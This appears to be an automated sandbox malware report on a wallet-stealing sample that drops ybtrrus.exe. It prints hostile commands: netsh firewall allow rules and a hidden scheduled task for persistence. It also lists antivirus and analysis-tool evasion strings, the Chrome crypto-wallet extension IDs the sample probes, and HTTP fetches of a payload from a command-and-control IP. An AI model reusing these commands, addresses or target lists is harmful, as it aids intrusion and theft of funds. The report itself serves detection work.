Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\pnVcakKiqh\ybtrrus.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\iDQiPwFWUp\ybtrrus.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns

Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager!$
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program ManagerA"\|
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager!$\|
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Managerq"\|
Source: ybtrrus.exe, 00000021.00000002.2697436058.000000000927B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager'X
Source: ybtrrus.exe, 0000001C.00000002.2695219573.000000000941B000.00000004.00000010.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2697436058.000000000927B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: )Program Manager Chromexe)nWindowClass.0
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000005FC5000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000060D5000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.0000000005FAA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: Shell_TrayWndStartU
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000005E66000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.0000000005F76000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.0000000005FAA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32U
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Managerq"
Source: ybtrrus.exe, 0000001C.00000002.2691639077.000000000778E000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.000000000775E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROGRAM MANAGERATIONAREAICONWINDOWCLASS.0
Source: ybtrrus.exe, 0000001C.00000002.2695219573.000000000941B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managerration Wizard
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program ManagerQ!\|
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager1#
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager1
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager@
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000005E66000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 0000001C.00000002.2657419183.0000000005FC5000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000060D5000.00000020.00000001.01000000.0000000D.sdmp	Binary or memory string: Shell_TrayWndU

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C819920 cpuid

12_2_6C819920

Contains functionality to query locales information (e.g. system language)

Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: GetLocaleInfoA,	28_2_6FE62D4C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	28_2_0545FCCC
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	28_2_0545FCCA
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	28_2_0545F12C
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	28_2_0545F128
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: GetLocaleInfoW,	28_2_05467DC6
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: GetLocaleInfoW,	28_2_05467DBE
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: EnumSystemLocalesW,	28_2_05467C86

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp\0101a.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp\0101a_decrypted.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\iDQiPwFWUp VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh\0101a.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh\0101a_decrypted.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\pnVcakKiqh VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C8555EE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_6C8555EE

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467ACE GetUserNameA,

28_2_05467ACE

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467EFE GetTimeZoneInformation,

28_2_05467EFE

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_6FE6070D InitializeCriticalSectionAndSpinCount,GetVersion,

28_2_6FE6070D

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\iDQiPwFWUp\ybtrrus.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any

AV process strings found (often used to terminate AV products)

Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: procmon.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: tcpview.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: Wireshark.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: procexp.exe
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000F25000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: LordPE.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: autoruns.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: ollydbg.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp	Binary or memory string: regmon.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\iDQiPwFWUp\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\pnVcakKiqh\ybtrrus.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Tries to access browser extension known for cryptocurrency wallets

Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeachknmefphepccionboohckonoeemg
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\iDQiPwFWUp\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blnieiiffboillknjnepogjhkgnoapac
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeachknmefphepccionboohckonoeemg
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\pnVcakKiqh\ybtrrus.exe	File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blnieiiffboillknjnepogjhkgnoapac

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C83C9A0 getsockname,WSAGetLastError,bind,WSAGetLastError,closesocket,

12_2_6C83C9A0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
213.188.196.246	unknown	Italy	25400	TELIA-NORWAY-ASTeliaNorwayCoreNetworksNO	false
128.138.140.44	unknown	United States	104	COLORADO-ASUS	false
147.45.116.5	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
208.76.221.217	unknown	United States	62489	WCITUS	false
132.163.96.1	unknown	United States	49	US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS	false
132.163.96.2	unknown	United States	49	US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS	false
20.42.65.92	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.189.173.21	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

AV Detection

Multi AV Scanner detection for submitted file

Source: T8TY28UxiT.dll

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.0% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C8201F0 BCryptGenRandom,SystemFunction036,

12_2_6C8201F0

Source: ybtrrus.exe

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

Uses 32bit PE files

Source: T8TY28UxiT.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Source: T8TY28UxiT.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: g2m.pdb source: rundll32.exe, 0000000C.00000002.1908516008.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll
Source:	Binary string: d:\Projects\WinRAR\rar\build\unrardll32\Release\unrar.pdb source: rundll32.exe, 0000000C.00000003.1880320269.000000000316E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934185341.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000002.2706441073.000000006FE65000.00000002.00000001.01000000.00000008.sdmp, ybtrrus.exe, 00000021.00000002.2704695699.000000006EA25000.00000002.00000001.01000000.0000000C.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C831F00 CloseHandle,memset,FindFirstFileW,FindClose,	12_2_6C831F00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8316F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,	12_2_6C8316F0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_6FE4C2D0 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,	28_2_6FE4C2D0
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545FB74 FindFirstFileW,FindClose,	28_2_0545FB74
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_0545F590 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	28_2_0545F590
Source: C:\iDQiPwFWUp\ybtrrus.exe	Code function: 28_2_05467CC6 FindFirstFileW,	28_2_05467CC6

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05467DCE GetLogicalDriveStringsW,

28_2_05467DCE

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5080fa819e61b36dbd2b7e7e74bdf5c819fed0_7522e4b5_75dffb69-1a82-4980-a5db-ce9131bf24b7\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fcdd551db92618d3725e94eeb7507dfc72111acd_7522e4b5_17fea6c8-cf23-47b2-9980-606d9795cdc0\	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 147.45.116.5 80

Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: /host: 147.45.116.5
Source: global traffic	HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: /host: 147.45.116.5
Source: global traffic	HTTP traffic detected: GET /index.php?user-PC HTTP/1.1accept: /host: 147.45.116.5

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 213.188.196.246 213.188.196.246
Source: Joe Sandbox View	IP Address: 213.188.196.246 213.188.196.246
Source: Joe Sandbox View	IP Address: 128.138.140.44 128.138.140.44

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
